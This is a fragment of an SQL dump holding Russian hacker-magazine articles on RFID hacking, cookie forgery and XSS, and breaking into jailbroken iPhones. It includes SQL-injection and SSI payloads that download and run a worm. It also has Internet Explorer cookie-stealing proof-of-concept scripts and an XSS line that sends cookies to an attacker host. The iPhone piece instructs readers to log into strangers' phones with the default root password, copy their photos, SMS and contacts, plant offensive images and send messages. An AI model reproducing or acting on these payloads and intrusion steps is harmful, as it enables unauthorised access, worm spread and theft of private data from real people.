аппаратурой. Таким образом, возможен взлом даже достаточно длинных ключей, причем в весьма короткое время. И это уже не проблема шифрования, а скорее проблема недоработанности самой технологии RFID. Шамир представил также интересную идею о возможности создания девайса для расшифровки данных с UHF RFID-тегов из обычного мобильника путем замены его ПО. Ведь GSM-мобилы и UHF-радиомети могут работать в одних и тех же частотах. Буду с нетерпением ждать, что получится из этой затеи =).<br /><br />{Подмена содержимого памяти RFID-меток}<br /><br />Не спасает шифрование паспортов и от их клонирования. На завершившейся недавно хакерской конференции Defcon, немецкий эксперт инфосека Лукас Грюнвальд (Lukas Grunwald) продемонстрировал, как содержимое электронного паспорта может быть легко перенесено на любую другую радиометку. При этом Лукас использовал разработанную вместе с его коллегой Борисом Вольфом (Boris Wolf) еще пару лет назад прогу RFDump , которая умеет считывать, редактировать, записывать (если это возможно) данные RFID-меток. Первой версией данной проги был простенький perl-скрипт, теперь же RFDump представляет собой удобную тулзу, распространяющуюся под лицензией GPL. Существуют пока только версии для пингвина. Для работы проги необходим RFID-ридер ACG Multi-Tag Reader или ему подобный. Грюнвальд вносит в софтину время от времени кое-какие нововведения, например, сейчас она позволяет задействовать в метке счетчик считываний (функция cookie), планируется введение возможности снятия шифрования данных меток с помощью брутфорса или атаки по словарю, а так же проверка на ключи, выставляемые "по умолчанию". Скачать RFDump можно на сайте разработчиков - http://www.rf-dump.org .<br /><br /><br />[ программа RFDump ]<br /><br /><br />После создания своей проги, Лукас и Борис занялись активным изучением возможности взлома различных RFID-систем. Первым делом они изучили RFID-систему местного университетского кафе, где данные о сумме на счете клиента хранились прямо на карточке. Питание там стало для них бесплатным . Дальше больше: они останавливались в гостиницах и отелях, в которых для входа в номер использовались proximity-карты. Интересный факт: ни одна RFID-система в отелях из изученных ими десяти не имела шифрования, и Грюнвальд после изучения 2-3 карт мог создать мастер-карту открывающую любую дверь. Но и системы с шифрованием часто оказывалось обойти очень просто - либо ключ подбирался простым перебором, либо стоял выставленный производителем по умолчанию. Уязвимыми оказались и системы супермаркетов, где начали применять RFID как альтернативу штрих-кодам. Хакеры получили возможность с помощью карманных компьютеров переобозначать метки на дорогостоящих товарах как на менее дорогих, "экономя" таким образом свою наличность. Со слов Грюнвальда, 3/4 всех изученных им RFID-систем оказались так или иначе уязвимыми.<br /><br />{Атаки через RFID-метки}<br /><br />Но несанкционированное чтение и клонирование меток это еще не все возможные тонкие места RFID-систем. Редактирование содержимого RFID-метки может позволить злоумышленнику осуществить самые разнообразные атаки на компьютеры, работающие с RFID. Уязвимыми местами RFID-систем могут стать базы данных, которые могут быть подвержены sql-инъекциям; web-интерфейсы - здесь возможны различные виды внедрения вредоносного кода; не исключена возможность атак типа buffer overflow.<br /><br />Наиболее просто реализуема атака типа sql-injection. Допустим, приложение работающее с RFID записывает на метку какую-то информацию, например, если это коробка с товаром, об ее содержимом - "beer". Вот пример атаки на win-систему, уязвимую к sql-inj: хакер изменяет значение тега на "beer'; EXEC Master..xp_cmdshell cd \Windows\Temp & tftp -i <здесь ip> GET worm.exe & worm.exe;" и загружает (конечно, если машина подключена к инету) таким образом червя в систему с БД товаров при считывании информации с метки.<br /><br />Аналогично происходят атаки на системы, имеющие интерфейс, основанный на веб-компонентах. К примеру, внедрение через метку кода "<!--#exec cmd="wget http://ip/worm -O /tmp/worm; chmod +x /tmp/worm; /tmp/worm "-->" в уязвимую linux-систему с SSI повторяет вышеописанную атаку на винду. Как ты уже понял, эти атаки практически ничем не отличаются от аналогичных атак на сайты в инете.<br /><br />Еще пример. Допустим, в RFID-системе используются только метки с объемом памяти 128 байт. Программист, писавший приложение, обрабатывающее содержимое тегов, поленился сделать проверку на длину этого самого содержимого. В итоге имеется возможность для переполнения буфера - ведь хитрый хакер может подсунуть системе метку с большим количеством памяти, чем 128 байт, внедрив туда и шелл-код.<br /><br />Вышеприведенные сценарии атак я позаимствовал на сайте www.rfidvirus.org. На этом сайте выкладываются результаты исследований уже упомянутой в статье группы ученых во главе с профессором Э.Таненбаумом. Главной целью их исследований было создание вируса, распространяющегося через RFID. И им это удалось - первый концептуальный вирус, не получивший названия, был создан в лаборатории амстердамского университета. Вирус распространяется через RFID-метки и заражает БД систем, использующих RFID.<br /><br /><br />[ Первая радиометка зараженная RFID-вирусом ]<br /><br />Конечно, далеко не все RFID-системы подвержены подобного рода атакам. Таненбаум в своих исследованиях использовал не конкретную реализацию какой-то RFID-системы, а созданную для опытов лабораторную модель с модульной архитектурой, позволяющей изучать возможность атак на различные БД, используемых в реальных системах. И хотя производители RFID-систем подвергли критике исследования голландцев, думаю, с повсеместным распространением подобных систем окажется, что немалая их часть будет уязвима к разного рода хакерским атакам.<br /><br />","RFID-хакинг<br />","journal_images/img_899147.png","1377069279","4");
INSERT INTO gazeta_article VALUES("152","21","<br />1 Описание технологии cookie<br />1.1 Что такое cookie?<br />1.2 Применение cookie<br />1.3 Установка cookie<br />1.4 Чтение cookie<br /><br />2 Способы фальсификации cookie<br />2.1 Общая информация<br />2.2 Методы фальсификации<br />2.2.1 Уязвимость броузера<br />2.2.2 Уязвимость Internet ресурса<br />2.2.3 Особое мнение<br />2.3 Обзор XSS<br />2.4 Хищение cookie при помощи Trace<br />2.5 Безопасность технологии .NET<br /><br />3 Способы защиты cookie<br /><br />-------------------------------------------------------------------<br /><br />1 Описание технологии cookie. <br /><br />1.1 Что такое cookie?<br /><br />Cookie является решением одной из наследственных проблем HTTP спецификации. Эта проблема заключается в непостоянстве соединения между клиентом и сервером, как при FTP или Telnet сессии, т.е. для каждого документа (или файла) при передаче по HTTP протоколу посылается отдельный запрос. Включение cookie в HTTP протокол дало частичное решение этой проблемы. <br /><br />Cookie - это некое значение в текстово-цировом виде, которое сервер передает браузеру. Браузер будет хранить эту информацию и передавать ее серверу с каждым запросом как часть HTTP заголовка. Одни значения cookie могут храниться только в течение одной сессии и удаляются после закрытия браузера. Другие, установленные на некоторый период времени, записываются в файл. Вот как выглядит схема работы удаленного хоста и клиента через Интернет:<br /><br />Сами по себе cookies ничего не могут делать. Однако сервер может считывать содержащуюся в cookies информацию и на основании ее анализа совершать те или иные действия. <br /><br />Клиент имеет следующие ограничения для cookies: <br />всего может храниться до 300 значений cookies<br />каждый cookie не может превышать 4Кбайт<br />с одного сервера или домена может храниться до 20 значений cookies<br /><br />В случае, если cookie принимает новое значение при имеющемся уже в броузере cookie с совпадающими данными, старое значение затирается новым. В остальных случаях новые cookies добавляются. <br /><br />1.2 Применение cookie.<br /><br />Ипользование cookie - эффективное решение сохранения пользователькой информации. Многие считают их опасными, якобы они могут заразить компьютер вирусом или украсть их пароль подключения к Интернету. Как ни странно это утверждение является ошибочным. Но считать cookie безопасными тоже нельзя. Для примера приведу несколько примеров их использования и их "опасности":<br /><br />1 Вы пользуетесь почтой с WEB интерфейсом. Чтобы не вводить пароль при каждом входе на ваш почтовый ящик, вы ставите галочку возле надписи "Сохранить пароль". Вследствии чего иформация с вашим логином и паролем сохраняется в cookie и при каждом входе на почту пароль и логин установлятся автоматически.<br /><br />2 Похожий пример можно привести и с Интернет магазинами. Заполнив форму с данными о вашей кредитной карточке они сохраняются и при следующей покупке вам не придется заполнять все заново.<br /><br />Это удобно с точки зрения пользователя, но о безопасности данной технологии не может быть и речи. Хотя некоторые методы защиты все-таки используются:<br />Информация из Cookie одного домена второго уровня (плюс подуровни) не может быть прочитана другими доменами.<br />Если документ кэшируется, то информация о cookie не кэшируется.<br />Информация Cookie может передаваться с помощью протокола SSL.<br /><br />1.3 Установка cookie.<br /><br />Установка cookie делается посредствам HTTP протокола. Например, клиент получив от сервера строку:<br /><br />Set-Cookie: name=value; EXPIRES=date; DOMAIN=domain_name; PATH=path; SECURE<br /><br />"Запомнит", что для сервера domain_name необходимо установить значение переменной name в value. Вот краткое описание значения каждой переменной:<br /><br />NAME=VALUE - строка символов, исключая перевод строки, запятые и пробелы. NAME-имя cookie, VALUE - значение. <br /><br />expires=DATE - время хранения cookie, т.е. вместо DATE должна стоять дата в формате Wdy, DD-Mon-YYYY HH:MM:SS GMT, после которой истекает время хранения cookie. Если этот атрибут не указан, то cookie хранится в течение одного сеанса, до закрытия броузера. <br /><br />domain=DOMAIN_NAME - домен, для которого значение cookie действительно. Например, domain=domen.com. В этом случае значение cоokie будет действительно и для сервера domen.com, и для www.domen.com. Но не радуйтесь, указания двух последних периодов доменных имен хватает только для доменов иерархии "COM", "EDU", "NET", "ORG", "GOV", "MIL", и "INT". Для доменов иерархии "RU" придется указывать три периода. <br /><br />Если этот атрибут опущен, то по умолчанию используется доменное имя сервера, с которого было выставлено значение cookie.<br /><br />path=PATH - этот атрибут устанавливает подмножество документов, для которых действительно значание cookie. Например, указание path=/win приведет к тому, что значение cookie будет действительно для множества документов в директории /win/, в директории /wings/ и файлов в текущей директории с именами типа wind.html и windows.shtml <br /><br />Если этот атрибут не указан, то значение cookie распространяется только на документы в той же директории, что и документ, в котором было установлено cookie. <br /><br />secure - если стоит такой маркер, то информация cookie пересылается только через HTTPS (HTTP с использованием SSL). Если этот маркер не указан, то информация пересылается обычным способом. <br /><br /><br />Разные языки программирования предлагают свою реализацию изменения cookie. Давайте рассмотрим некоторые из них:<br /><br />1. HTML позволяет изменить значения печеньек(именно так переводится слово "cookie") так:<br /><META HTTP-EQUIV="Set-Cookie" CONTENT="name=john; EXPIRES=Friday,31-Dec-02 <br />23:59:59 GMT; DOMAIN=server.ru; PATH=/users/; SECURE"><br />2. Реализация на Perl:<br />print "Set-Cookie: name=john; expires=Friday,31-Dec-02 23:59:59 GMT; <br />path=/users/; domain=server.ru;\n\n";<br />3. То же на javascript:<br />document.cookie="name=john; expires=Friday,31-Dec-02 23:59:59 GMT; <br />path=/users/; domain=server.ru;";<br />1.4 Чтение cookie.<br /><br />Чтобы прочитать скриптом значение cookie, которое было установлено ранее, и соответствующим образом выполнить скрипт, используется переменная окружения HTTP_COOKIE. <br /><br />1. На Perl это будет выглядеть так:<br /><br />PHP код:<br />$cookie = $ENV{'HTTP_COOKIE'}; <br /><br /><br />2. При использовании SSI для просмотра значения cookie можно применить директиву:<br /><br />PHP код:<br /><!--#echo var="HTTP_COOKIE"--> <br /><br /><br />3. JavaScript может прочитать значение использовав свойство обьекта document:<br /><br />PHP код:<br />var strCokie=document.cookie; <br /><br /><br />Когда запрашивается документ с HTTP сервера, броузер проверяет свои cookie на предмет соответствия домену сервера и прочей информации. В случае, если найдены удовлетворяющие всем условиям значения cookie броузер посылает их в серверу в виде пары имя/значение:<br />Cookie: name=john;<br />После всего это неискушенному пользователь может показатся, что опасности в данной технологии нет. Но это только на первый взгляд...<br /><br />2 Способы фальсификации cookie.<br /><br />2.1 Общая информация. <br />Подменить Cookie намного проще, чем их прочитать. Хотя если речь идет о удаленном компьютере, то задачи становятся равносильными. Дело в том, что подмена - это простая отправка Cookie на сервер, а чтение разрешено только серверу. Для реализации чтения используется так называемая технология Cross Site Scripting(СSS или XSS, назван так, чтобы избежать путаницы с CSS, aka Cascade Style Sheets). По заявлению "Panda Software Russia" данная уязвимость присутствует в следующих браузерах:<br />Mozilla (версии до 0.9.7.)<br />Netscape (версии до 6.2.1.)<br />MS Internet Explorer (5.5 и 6.0.)<br /><br />Я считаю, этого достаточно, так-как это самые распространенные браузеры в сети Интернет. Cross Site Scripting можно осуществить через уязвимость в броузере или некорректное Web програмирование. Давайте рассмотрим все по порядку.<br /><br />2.2 Методы фальсификации<br /><br />XSS имеет два варианта реализации:<br /><br />A: Уязвимость броузера<br />B: Уязвимость Internet ресурса<br /><br />Каждый выбирает свой вариант, в зависимости от конкретной ситуации. Атака через уязвимость в броузере удобна ее универсальностью по отношению к Web ресурсам. В то же время она не будет эффективна, если пользователь использует иной броузер(а иногда и другую его версию). Уязвимость Internet ресурса - наоборот, безразлична к броузеру, но работает только с одним сайтом.<br /><br />2.2.1 Уязвимость броузера<br /><br />Буквально всю первую половину 2002 года на BUGTRAQ, почти ежедневно, поступали сообщения о уязвимостях Internet Explorer и других броузеров. На данный момент последнее, насколько мне извесно, известие за 24.10.2002 гласит:<br /><br />"При передаче данных между окнами броузер проверяет, находятся ли они в одной зоне безопасности и в одном домене. Всего компания GreyMagic Security нашла девять способов обойти проверку и все они связаны с кэширование объектов....<br /><br />PHP код:<br /><script> <br />var oWin=open("blank.html","victim","width=100,height=100"); <br />var fVuln=oWin.document.getElementById; location.href="http://www.mail.ru"; <br /><br />setTimeout( <br />function(){ <br />alert(fVuln("ElementIdInNewDoc").document.cookie); <br />} <br />,3000); <br /><br /></script> <br /><br /><br />IE 5 SP2 и IE6 SP1 не уязвимы."<br /><br />Как видно IE5-SP2 и IE6-SP1 не уязвимы. Для них есть другой експлоит за 16.10.2002:<br /><br />"Элементы <frame> и <iframe> могут содержать URL других доменов или протоколов, поэтому для них созданы более строгие правила защиты, которые предотвращают доступ из фрейма одного домена к содержанию другого домена.<br /><br />Есть несколько способов обратится к <iframe> (или <frame>) документам в Internet Explorer (<iframe id="oFrameId">):<br />oFrameId.document<br />document.all.oFrameId.contentWindow.document<br />frames.oFrameId.document<br />И другие<br /><br />Все эти методы правильно обрабатываются Internet Explorer и он предотвращает любую попытку обращения к документу, который принадлежит другому домену.<br /><br />Однако Microsoft пропустил одно важное свойство - "Document". Обнаружено, что когда используется "oIFrameElement.Document", и возращенный документ содержится внутри frame, не происходит никаких проверок защиты, находится ли документ в другом домене. Уязвимость позволяет атакующему получить доступ к DOM другого домена, и украсть cookie любого сайта, читать локальные файлы и выполнять произвольный код на системе клиента.<br /><br />Пример (читает cookie mail.ru):<br /><br />PHP код:<br /><script> <br />onload=function () { <br />setTimeout( <br />function () { <br />alert(document.getElementById("oVictim").Document.cookie); <br />}, <br />100 <br />); <br />} <br /></script> <br /><iframe src="http://www.mail.ru" id="oVictim"></iframe> <br /><br /><br />Уязвимость обнаружена в Internet Explorer 5.5sp2-6.0.",","Фальсификация cookie<br />","journal_images/img_993677.png","1377069525","4");
INSERT INTO gazeta_article VALUES("153","21","Многие относятся к iPhone как к телефону для блондинок. Он, и правда, нравится блондинкам, но работает при этом под управлением абсолютно полноценной Unix-операционки. Мобильная OS X изготавливается из настольной Mac OS X, которая, в свою очередь, является современной версией системы BSD-семейства NeXTSTEP, увидевшей свет за пять лет до ядра Linux — в 1986 году.Инженеры Apple удалили из операционки iPhone почти все консольные утилиты, однако при установке OpenSSH на взломанный iPhoneтребуется поставить еще и пакет с BSD-окружением, так что тебя встретит компания старых друзей: от curl, scp и zsh до tar, bzip2 и gunizp. Как и в любой Unix-системе, в мобильной Mac OS X есть суперпользователь с именем root и паролем, которым чаще всего по умолчанию является <br />строка «alpine».Шесть букв в одном регистре — обычно плохая идея для пароля root, но в обычном, не взломанном, iPhone вводить этот пароль некому и некуда. Он мог бы быть любым, и ничего бы не изменилось. <br />В России, разумеется, все iPhone взломаны, и на большинстве этих взломанных телефонов установлен OpenSSH — как единственный способ получить доступ к файловой системе. Когда-то это было стандартным этапом взлома и активации. <br />Таким образом, мы получаем очень забавную картину: почти к любому айфону в России можно удаленно подключиться по ssh с дефолтовой записью root:alpine и получить неограниченные возможности в управлении. <br />Заставить телефон звонить и отправлять SMS — легко. Украсть базу с SMS,записную книжку, фотографии — еще проще. Вообще, можно сделать все,что угодно. <br />Обнаружение <br />Практическую часть экспериментов мы начнем с этапа, который называется «обнаружение». Ведь нужно знать, куда подключаться: к какому ip-адресу. Вообще говоря, у iPhone два сетевых интерфейса: Wi-Fi(en0, согласно ifconfig) и GPRS (PPP-интерфейс ip1, согласно тому же <br />ifconfig). Для взлома лучше взаимодействовать с телефоном по Wi-Fi:GPRS пролегает по территории сотового провайдера и, к тому же, это очень медленный протокол. Между тем, времени для взлома обычно немного — iPhone любит поспать, и в режиме ожидания (standby mode) практически все процессы (твоя ssh-сессия, запущенный тобой процесс, даже запланированные по cron процессы) ставятся на паузу и возобновляются только после того, как владелец достанет телефон из кармана и разбудит его. Батарейку это экономит, а нервы может подсадить.Можно придумать схему со сканированием всего доступного IP-диапазона какого-нибудь сотового провайдера или с <br />регистрацией IP-адресов пользователей MobileSafari, зашедших на специально заведенный сайт — но все это лучше отложить на скучные зимние вечера. Куда быстрее и веселее увидеть человека,задумчиво гладящего на экран своего телефона в офисе или кафе с открытой WiFi-сетью. <br />Обнаружить iPhone с помощью nmap — элементарно. Запусти сканирование стандартным образом (например, nmap -O 10.0.0.*) и увидишь в списке прочих хостов вот такие записи: <br />Not shown: 1714 closed ports <br />PORT STATE SERVICE <br />22/tcp open ssh <br />MAC Address: XX:XX:XX:XX:XX:XX (Apple) <br />Device type: phoneImedia device <br />Running: Apple embedded <br />OS details: Apple iPhone mobile phone or <br />iPod Touch audio player (Darwin 9.0.0d1) <br />Конечно, сканировать всю подсеть с ключом -O — долго и утомительно. Правильнее было бы пройтись по ней без ключа -O и только потом определить ОС на хостах с открытым 22#ым <br />портом. Но и это не самый рациональный способ. На взломанном iPhone запущен не только sshd, но и mDNSResponder (Zeroconf от Apple). То есть при входе в сеть iPhone оповещает всех присутствующих о том, какие сервисы он предоставляет. Достаточно запустить, к примеру, SFTP-клиент с поддержкой Bonjour (допустим, Cyberduck под Mac OS X), и он известит тебя о появлении нового хоста в сети. Более того, mDNSResponder доступен в виде исходников, портирован на Linux и на Windows, и его легко использовать для автоматизации процесса поиска и проверки всех появившихся в сети телефонов. <br />Еще о системе <br />В мобильной OS X два пользователя (не считая nobody и unknown): root (это ты) и mobile (это владелец телефона). Файловая система телефона разделена на две части. Папка /var/mobile , содержащая данные пользователя, отделена от остальной системы (сделано для того, чтобы после обновления прошивки не нужно было заново заливать на iPhone адресную книгу, музыку и так далее). <br />Как в любой приличной UNIX ОС, в OS X все — либо файл, либо папка. Самые важные для тебя папки — Library (в них хранятся персональные данные и настройки) и Media (в них хранятся картинки, музыка и видео). В корне файловой системы (помимо стандартных etc, usr, dev и т.д) ты найдешь папки System,Library и Applications . Внутри папки System находится еще одна папка Library . Другая папка Library принадлежит пользователю mobile ( /var/mobile/Library ). В настольной Mac OS X положение папки Library определяет ее значимость — в /System/Library свои данные хранят системные приложения, в /Library хранятся данные пользовательских приложений, общие для всей системы, а в ~/Library — личные данные пользователя. То же относится и к мобильной OS X. Поэтому большинство интересных вещей (настройки,базы sms и почтовые базы) ты найдешь в папке /var/mobile/Library/ , а ключи доверенных WiFi-сетей — в /Library . <br />Итак, теперь ты знаешь, где искать полезные данные, но как они выглядят? Данные в мобильной OS X могут лежать внавалку, храниться в файлах .plist или базах SQLite . <br />Внавалку <br />Хотя параноики из Apple предпочитают записывать все в отдельные базы данных, кое-что валяется на диске iPhone просто так. Например, сделанные встроенной камерой снимки лежат в /var/mobile/Media/DCIM . Если хочешь их быстро украсть (надежда на домашнее порно жива и будет жить всегда) — воспользуйся утилитой scp: scp -r root@iPhone.local.:/var/mobile/Media/DCIM Человек подарил тебе надежду на домашнее порно — подари ему что-нибудь взамен, сделай его жизнь немножечко лучше. Картинка, которую он использует в качестве фона, хранится в файле /var/mobile/Library/LockBackground.jpg . Неважно, выбрана ли она системных картинок, залита с компьютера или снята встроенной камерой — она будет скопирована в это место и уменьшена до 320х480 пикселей. Размер важен — если картинка будет больше или меньше, она не будет масштабироваться. В жизни каждого должна быть минутка для goatse. Скопируй заранее подготовленную картину на место <br />указанной (например, curl http://goatse.cx/hello.jpg -o /var/mobile/Library/LockBackground.jpg ), закрепи (чтобы растянуть удовольствие): chmod -w /var/ mobile/Library/LockBackground.jpg и перезапусти SpringBoard (killall SpringBoard). Теперь владелец iPhone будет постоянно видеть (без вариантов!) одну из старейших реликвий интернета. Настройки мобильной OS X — яркость, мелодия звонка, время срабатывания будильников и прочее — хранятся, как и в настольной Mac OS X, в файлах plist. Файлы plist бывают двух видов — текстовые и бинарные. Текстовые, разумеется, можно <br />править любым текстовым редактором (это простой, легко читаемый XML); бинарные надо конвертировать в текстовые, а потом обратно. В мобильной OS X используются оба типа— системные настройки хранятся в текстовом виде, пользовательские — в бинарном. <br />Конвертируются плисты с помощью утилиты plutil.Если ты пользуешься Mac OS X, она у тебя уже есть, если нет — скачай. Существуют версии и для Linux, и для Windows. Команда plutil -convert преобразует файл из бинарного в текстовый и обратно; после plutil - convert xml1 ты сможешь править файл, после plutil -convert binary1 — скопировать его обратно. Еще лучше пропихнуть на iPhone собранную Эрикой Садун версию plutil для мобильной OS X — она может исправлять различные параметры прямо из командной строки, без конвертации. <br />Например, в файле /var/mobile/Library/Prefences/com.apple.springboard.plist (после конвертации в <br />XML) содержится подобный ключ: ringtone system:Motorcycle <br />Эта настройка определяет общую мелодию звонка. Значение в может быть одним из следующих: <br />1) (рингтон по умолчанию, называется Marimba); <br />2) system:название рингтона (рингтон из поставляемых с системой, они содержатся в папке /Library/Ringtones ; приведенный выше рингтон — это файл /Library/Ringtones/Motorcycle.m4a ); <br />3) itunes:цифро-буквенный код (залитый пользователем рингтон, содержащийся в /var/mobile/ <br />Media/iTunes_Control/Ringtones ; код здесь не имя файла, а идентификатор из какой-то базы данных). <br />Изменив этот ключ, ты сможешь изменить используемыйрингтон. Самый надежный способ — заменить все системные рингтоны своим (контейнер — MPEG-4, кодек — ААС, длительность — не больше 40 секунд, расширение — .m4r).Чтобы изменить значение ключа ringtone, либо сконвертируй <br />com.apple.springboard.plist в текст, измени его вручную и сохрани, либо, используя утилиту Эрики, отдай команду: plutil -s ringtone -v "system:Sonar" /var/ <br />mobile/Library/Preferences/com.apple.springboard.plist По тому же принципу можно изменить любые настройки мобильной OS X. За год существования iPhone они были прекрасно документированы, а то, что ты не найдешь в Google, за тебя найдет grep. sqlite Наконец, в маленьких уютненьких базочках SQLite хранятся замечательные вещи — база SMS, адресная книжка и многое <br />другое. База SMS лежит тут — /var/mobile/Library/ SMS/sms.db, адресная книга тут — /var/mobile/ <br />Library/AddressBook.sqlitedb . Скопировав их на свою машину, ты сможешь разобраться в структуре и содержимом с помощью утилиты sqlite3 (у пользователей Mac OS X она есть сразу, у пользователей Linux и Windows тоже не будет особых проблем). <br />Утилита может выполнять твои желания интерактивно или прямо из командной строки. Если ты вызовешь ее с SQL-запросом, она исполнит его и выйдет. Если без — она вернет тебе приглашение и будет ждать других запросов и команд. Самые интересные таблицы — таблица messages в sms.db и табли-ца ABPerson в AddressBook.sqlitedb. Ты можешь читать, парсить и изменять эти базы, более того — Эрика и ее портировала на iPhone (к вопросу о силе open source). Не забудь сделать резервную копию для себя <br />— мало ли для чего может пригодиться база чужих SMS и адресная книга с работающими телефонами и электронными адресами. И, конечно, используй sqlite3 в целях мира во всем мире: sqlite3 sms.db "INSERT INTO messages VALUES(0, ' 0000000', 1354321900, ' МЫ ЛЮДИ БУДУЩЕГО НЕ ЗАПУСКАЙТЕ КОЛЛАЙДЕР НЕ ЗАПУСКАЙТЕ КОЛЛАЙДЕР',1,0,NULL,0,0,0,0,0) <br />" Пускай человек внезапно обнаружит в своей базе послание из будущего (1 декабря 2012 года в 00:31:40 по Гринвичу — третье поле в таблице содержит дату в эпохе). AT OM FG! <br />Это же телефон, черт возьми! Музыка музыкой, картинки картинками, но главная задача сотового телефона — сотовая связь. Вообще, модем в сотовом телефоне (в iPhone это /dev/tty.baseband ) обычно недоступен — на нем висит коммуникационный процесс, ожидающий поступления звонков и сообщений. Но у нас есть лазейка — /dev/tty.debug . Чтобы поговорить с модемом, можно использовать mincom (он часть пакета с BSD-окружением). Его потребуется настроить (minicom -s), так как по <br />умолчанию он пытается соединиться с /dev/modem . Но если ты торопишься, создай симлинк -ln/dev/tty.baseband /dev/modem (симлинки на телефоне — это очень круто). <br />Теперь запусти minicom и начинай отдавать AT-команды. К примеру, команда AT CBC, сообщит тебе об уровне заряда батарейки: AT CBC CBC: 0,65 OK <br />Батарейка заряжена на 65%, и еще на какое-то время ее хватит. Теперь можно позвонить, отправить sms или подключить какую-нибудь хорошую услугу. Давай отправим sms — это меньшее, что мы можем сделать после того, как прочитали все имеющиеся. AT CMGF=1 // Модем переключается в текстовый режим (0 — голос, 1 — текст) и возвращает OK. “AT CMGW=“ 712345678“ // Здесь начинается, собственно, сообщение. Номер абонента — часть команды. Модем вернет приглашение ввести текст <br />сообщения. > Welcome... to the world of tomorrow! // Сообщение кончится, когда модем получит EOF — теперь оно будет записано в память. Модем вернет OK и CMGW: N, где N — индекс сообщения в памяти модема. AT CMSS=N // Отправка сообщения, индекс которого — N, вернет OK, если сообщение успешно отправлено. <br />Список AT-команд не менялся уже много лет. Используя их, ты сможешь отправлять SMS, набирать телефонные номера и изучать свойства аппаратной части iPhone. Для того чтобы отдавать AT-команды прямо из командной строки, было написано несколько утилит. Например, команда iPhone Elite выпустила утилиту sendmodem. Протолкнув sendmodem на iPhone, ты сможешь использовать <br />ее саму по себе или в скриптах. Исходный код утилиты — прекрасный пример того, как отдавать AT-команды программно. <br />Перспективы <br />Как видишь, даже без особой подготовки можно найти и поюзать iPhone, получив при этом огромное удовольствие. А если ты подготовишься, то сможешь сделать куда больше. Писать для iPhone не сложнее, чем для любой другой UNIX OS и значительно проще, чем для любого другого сотового телефона. Бесполезно помещать на iPhone Java-утилитки — ему требуется суровый мужской С. <br />Несмотря на возражения Apple, за год вокруг iPhone сложилось огромное девелоперское сообщество, и ты легко найдешь подробные инструкции по кросс-компиляции, мануалы и описания библиотек, узнаешь — как бороться с standby mode, перехватывать управление модемом и так далее. Представь себе маленькую утилитку, обнаруживающую другие телефоны по Bonjour, логиняющуюся по ssh с паролем alpine и оставляющую на них свою копию. Или утилитку, отправляющую sms (с вежливым приветствием всем людям в адресной книге — можно было бы обойтись 10-15 строчками кода). В общем, iPhone — действительно революционное устройство. <br />","Взлом Iphone<br />","journal_images/img_353802.png","1377069569","4");
INSERT INTO gazeta_article VALUES("154","21","Ошибки, связанные с межсайтовым скриптингом (Cross site scripting, XSS), являются достаточно известными, но по-прежнему исключительно опасными. Их уникальность заключается в том, что вместо непосредственной атаки сервера, они используют уязвимый сервер в качестве средства атаки на клиента. Это может сделать исключительно трудным отслеживание подобных атак, особенно если запросы не полностью протоколиуются (как в случае POST-запросов). <br /><br />Во многих документах рассматривается вопрос вставки HTML-кода в уязвимый скрипт, но обсуждение того, что может быть сделано с помощью успешной XSS-атаки, как правило, остается за скобками. Хотя обычно этого достаточно для защиты, истинная опасность XSS-атак зачастую остается недооцененной. В данном материале рассматриваются как раз такие подобные возможности XSS-атак. <br />Анатомия<br /><br />XSS-атака обычно проводится путем конструирования специального URL, который атакующий подсовывает своей жертве. Можно провести аналогию между XSS-атакой и переполнением буфера, и между встраиванием скрипта и переписыванием EIP. В обоих случаях существуют две возможности для совершения успешной атаки: вставка мусора, либо переход в другую точку. Вставка мусора при переполнении буфера обычно приводит к атаке на отказ в обслуживании. В случае XSS-атаки она позволяет атакующему отобразить произвольную информацию и подавить вывод оригинальной веб-странице. Что касается перехода в другую точку, при переполнении буфера он обычно производится в некоторую область памяти, в которой расположен код, позволяющий захватить контроль над исполнение программы. В случае XSS, атакующий перенаправляет жертву на некоторую веб-страницу (как правило, находящуюся под контролем атакующего), перехватывая текущую сессию. <br />Обнаружение<br /><br />Но каким образом осуществляются XSS-атаки? Они становятся возможными из-за ошибок в серверных приложениях, и корни их - в пользовательском вводе, который некорректно очищен от HTML-кода. Если атакующий получит возможность вставить произвольный HTML-код, то он сможет управлять отображением веб-страницы с правами самого сайта. Простейшая страница, уязвимая к подобным атакам, выглядит так:<br /><br />PHP код:<br /><?php echo "Hello, {$HTTP_GET_VARS['name']}!"; ?> <br /><br />При открытии страницы, переменная name, отправляемая методом GET, выводится непосредственно в ее теле, со всеми метасимволами. Передав в качестве параметра "Gavin Zuchlinski", мы получим корректный вариант отображения:<br /><br />Передав в параметре HTML-код, можно добиться неожиданного результата:<br /><br />Ввод не проверяется серверным скриптом перед тем как передать результат броузеру, и это позволяет вставить в уязвимую страницу произвольный пользовательский код. Иногда пользовательский ввод не обрабатывается скриптом непосредственно, а вставляется в файл или базу данных, и после этого забирается оттуда для вставки в страницу. <br /><br />Традиционным местом для XSS-ошибок являются страницы, выводящие всевозможные подтверждения (например, поисковые скрипты дублируют пользовательский ввод перед результатами поиска), и страницы с сообщениями об ошибках, сообщающие пользователю, что именно он ввел не так. В последнем случае (а иногда и в первом) для атаки часто достаточно закрыть содержимое текстового поля символами "> - кавычка закрывает параметр value, а > - весь тег. <br />Атака<br /><br />После определения уязвимого параметра следует определить подходящий для использования HTTP-метод. Способ, которым пересылаются значения переменных, довольно важен - посылаются ли данные с помощью GET, POST, или сработает любой из них? Некоторые скрипты предпочитают что-то одно, некоторые, использующие готовые методы доступа к переменным (как в случае PH или Perl-Скриптов с CGI.pm) могут работать с любым из методов (1). <br /><br />Вставка с помощью GET самая простая, но и самая "шумная". Чтобы помешать осторожным пользователям обратить внимание на редиректы и прочий подозрительный код в строке адреса, можно использовать замену каждого символа его шестнадцатиричным значением, которому предшествует символ %. Тем не менее, этот метод засоряет адрес и по умолчанию протоколируется большинством веб-серверов (2). <br /><br />Простейший способ перехода - вставка кода на javascript с редиректом страницы. Таким образом можно отправить на посторонний сервер значения переменных, доступных только из текущего документа. Более сложные переходы включают другие HTML-теги и объекты (4, 5). Если код вида <br /><br />document.location.replace('http://attacker/payload');<br />может быть вставлен и исполнен, то можно считать, что атакующий контролирует исполнение страницы. Модифицировав этот код: <br /><br />document.location.replace<br />('http://attacker/payload?c='+document.cookie);<br />мы добиваемся того, что сервер атакующего получает информацию о cookie жертвы. В случае упомянутой выше уязвимой страницы вставка кода является относительно простой: <br /><br />http://host/hello.php?name=<script>document.location.replac<br />e('http://attacker/payload?c='%2Bdocument.cookie)</script><br /><br />По самой природе XSS, атакующий не может непосредственно использовать уязвимый скрипт в личных целях. Встроенный код должна увидеть жертва. Если бы на том же сервере, что и hello.php, была 